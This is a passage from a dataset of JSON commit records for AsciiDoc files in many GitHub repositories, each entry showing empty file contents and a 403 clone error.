\/elasticsearch,LeoYao\/elasticsearch,JervyShi\/elasticsearch,rajanm\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,yanjunh\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,yanjunh\/elasticsearch,gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,brandonkearby\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,dongjoon-hyun\/elasticsearch,qwerty4030\/elasticsearch,gmarz\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,ricardocerq\/elasticsearch,njlawton\/elastics
earch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,rlugojr\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,liweinan0423\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,spiegela\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,s1monw\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,ricardocerq\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8030def695aadd2a2c0cbeadcf94ad87f2ae4c1c","subject":"CAMEL-11497 - add rollback-eip considering transactional-client.adoc from export of current camel-web","message":"CAMEL-11497 - add rollback-eip considering transactional-client.adoc from export of current 
camel-web\n","repos":"nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,CodeSmell\/camel,zregvart\/camel,alvinkwekel\/camel,objectiser\/camel,apache\/camel,DariusX\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,CodeSmell\/camel,dmvolod\/camel,anoordover\/camel,pmoerenhout\/camel,curso007\/camel,anoordover\/camel,anoordover\/camel,kevinearls\/camel,tadayosi\/camel,tdiesler\/camel,Fabryprog\/camel,jonmcewen\/camel,pax95\/camel,onders86\/camel,mcollovati\/camel,dmvolod\/camel,dmvolod\/camel,dmvolod\/camel,mcollovati\/camel,CodeSmell\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,sverkera\/camel,nicolaferraro\/camel,gautric\/camel,ullgren\/camel,pax95\/camel,jamesnetherton\/camel,Fabryprog\/camel,curso007\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,gautric\/camel,nicolaferraro\/camel,akhettar\/camel,snurmine\/camel,akhettar\/camel,dmvolod\/camel,christophd\/camel,gnodet\/camel,jonmcewen\/camel,jonmcewen\/camel,gautric\/camel,mcollovati\/camel,akhettar\/camel,gautric\/camel,snurmine\/camel,christophd\/camel,jonmcewen\/camel,tdiesler\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,christophd\/camel,Fabryprog\/camel,snurmine\/camel,jonmcewen\/camel,davidkarlsen\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,gautric\/camel,objectiser\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,anoordover\/camel,adessaigne\/camel,christophd\/camel,curso007\/camel,pax95\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,gautric\/camel,apache\/camel,onders86\/camel,kevinearls\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,onders86\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,onders86\/camel,davidkarlsen\/camel,DariusX\/camel,ullgren\/camel,kevinearls\/camel,gnodet\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,zregvart\/camel,jamesnetherton\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,zregvart\/camel,mcollovati\/camel,curso007\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,akhettar\/camel,davidkarlsen\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,adessaigne\/camel,sverkera\/camel,gnodet\/camel,onders86\/camel,ullgren\/camel,punkhorn\/camel-upstream,akhettar\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,curso007\/camel,sverkera\/camel,adessaigne\/camel,zregvart\/camel,nicolaferraro\/camel,jamesnetherton\/camel,dmvolod\/camel,adessaigne\/camel,DariusX\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,nicolaferraro\/camel,kevinearls\/camel,curso007\/camel,snurmine\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/rollback-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/rollback-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c7ae0d59a79147bba61fe412c9ceb1eedbbaa04","subject":"Update 2015-05-17-Keepster.adoc","message":"Update 
2015-05-17-Keepster.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-17-Keepster.adoc","new_file":"_posts\/2015-05-17-Keepster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee4d4265a504a38350a17996eb4030db32d015f2","subject":"Update 2016-02-05-new-Blog.adoc","message":"Update 2016-02-05-new-Blog.adoc","repos":"nanox77\/nanox77.github.io,nanox77\/nanox77.github.io,nanox77\/nanox77.github.io","old_file":"_posts\/2016-02-05-new-Blog.adoc","new_file":"_posts\/2016-02-05-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanox77\/nanox77.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d24e01f1802d8dadcdb02b38baa321917487887","subject":"Improvements in the documentation after reinstalling OSIS.","message":"Improvements in the documentation after reinstalling OSIS.\n","repos":"uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c6959f29d59d006a20840b30a813e7ebd3d84d87","subject":"Described the internationalisation in the documentation","message":"Described the internationalisation in the documentation\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8409fc6cf91b249a2dda2b8469d0811d9af72d71","subject":"Add missing article","message":"Add missing article\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fcd3b4b407330501c255ae5d8a3ffde78c6c9ef7","subject":"removed DDC reference","message":"removed DDC reference\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c65f6ef8f93f2638ba995ce6f1dede07017e924b","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8cd022813ed66c71034cca6d075b16b56a3837c","subject":"RESTEasy Reactive docs","message":"RESTEasy Reactive docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/resteasy-reactive.adoc","new_file":"docs\/src\/main\/asciidoc\/resteasy-reactive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aaea17b0ffbc27f76cdf337818a7178d334902da","subject":"[docs] Add admin docs for backup and restore","message":"[docs] Add admin docs for backup and restore\n\nThis patch adds the basic documentation for using the\n `KuduBackup` and `KuduRestore` Spark jobs.\n\nAdditionally it relocates the pysical backup section to\nbe colocated with the new backup documention.\n\nChange-Id: I75f92d3f10fd5d970099e933d8de2d7662e03398\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13780\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa1af621e3741ac0f0c3a7c669127d0876f41052","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"668232bd3b4d05348994985d190adb69fa99abcb","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a59cc6c7b73974036e3b59a50a6ceb49042d11c9","subject":"basic info about 
redis","message":"basic info about redis\n","repos":"openshift\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,themurph\/openshift-tools,jupierce\/openshift-tools,rhdedgar\/openshift-tools,blrm\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,blrm\/openshift-tools,openshift\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,jupierce\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,blrm\/openshift-tools,andrewklau\/openshift-tools,openshift\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,themurph\/openshift-tools,joelsmith\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,drewandersonnz\/openshift-tools,joelddiaz\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,andrewklau\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools","old_file":"docs\/redis_basics.asciidoc","new_file":"docs\/redis_basics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05ce3749ef75cf0191c98e33d9305e8e9c57e8b0","subject":"update NOTES","message":"update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6bd044cca5c072d4d1f0aa357a5d62beb935f6b","subject":"Changes to NOTES.adoc","message":"Changes to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3ba1374961d7f6cf43d6c8a28c09536a908e0e","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1e2e7b8ddc90dcd4fd9790310d6c9b2be479c78","subject":"Update 2017-01-18-A-Tiny-Poem.adoc","message":"Update 2017-01-18-A-Tiny-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-A-Tiny-Poem.adoc","new_file":"_posts\/2017-01-18-A-Tiny-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464a1545fd6a9b1a1069f5d065c2ccf187cc8025","subject":"Update 2019-01-31-Hello-World.adoc","message":"Update 2019-01-31-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2019-01-31-Hello-World.adoc","new_file":"_posts\/2019-01-31-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3342f781b7c73ff56301fa12e4726eb24aae42a7","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa9e520b469edb81da5c904cd2ab1e33892b915b","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30a053670db643eed4bafe3a4ef5b51812972583","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8081eabd112b6c72a524a1072c9702f30e8e25f","subject":"Update 2016-03-10-Grand-Central-Dispatch-iOS.adoc","message":"Update 
2016-03-10-Grand-Central-Dispatch-iOS.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-iOS.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-iOS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff5d5c89dc587d0a71e0b76e369883e18307ce80","subject":"Update 2016-04-19-Converting-I-Pv4-to-Binary.adoc","message":"Update 2016-04-19-Converting-I-Pv4-to-Binary.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-Converting-I-Pv4-to-Binary.adoc","new_file":"_posts\/2016-04-19-Converting-I-Pv4-to-Binary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c62fdf697856e1e4900933573834f777886a6bb6","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fad914ee1053c811e1526e2a5cc2102888cae19","subject":"Update 2019-01-31-Test-alt-title.adoc","message":"Update 2019-01-31-Test-alt-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-Test-alt-title.adoc","new_file":"_posts\/2019-01-31-Test-alt-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ccdb4f75183de74f071d312be92eecc352fae0c","subject":"y2b create post The Essential Phone Is Back!","message":"y2b create post The Essential Phone Is Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-15-The-Essential-Phone-Is-Back.adoc","new_file":"_posts\/2018-02-15-The-Essential-Phone-Is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21f47f9a6942a1ecaf945301bf22f88def359420","subject":"Update 2016-07-16-Hola-world.adoc","message":"Update 2016-07-16-Hola-world.adoc","repos":"htapia\/htapia.github.io,htapia\/htapia.github.io,htapia\/htapia.github.io,htapia\/htapia.github.io","old_file":"_posts\/2016-07-16-Hola-world.adoc","new_file":"_posts\/2016-07-16-Hola-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/htapia\/htapia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"984b9024831e7766607eaf392ddc4a44d40fd233","subject":"add quality goals","message":"add quality goals\n","repos":"pkleimann\/livingdoc,Drakojin\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,pkleimann\/livingdoc,testIT-LivingDoc\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2,pkleimann\/livingdoc,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,bitterblue\/livingdoc2,LivingDoc\/livingdoc,pkleimann\/livingdoc2,Drakojin\/livingdoc2,pkleimann\/livingdoc2","old_file":"doc\/qualitygoals.adoc","new_file":"doc\/qualitygoals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbf73c4692581ffc416912744b5224497cb8284f","subject":"Update spring-security-config module description","message":"Update spring-security-config module description\n\nInclude Java Configuration in the description.\n\nFixes gh-3298\n","repos":"mdeinum\/spring-security,fhanik\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,rwinch\/spring-security,pwheel\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,kazuki43zoo\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,fhanik\/spring-security,ollie314\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,thoma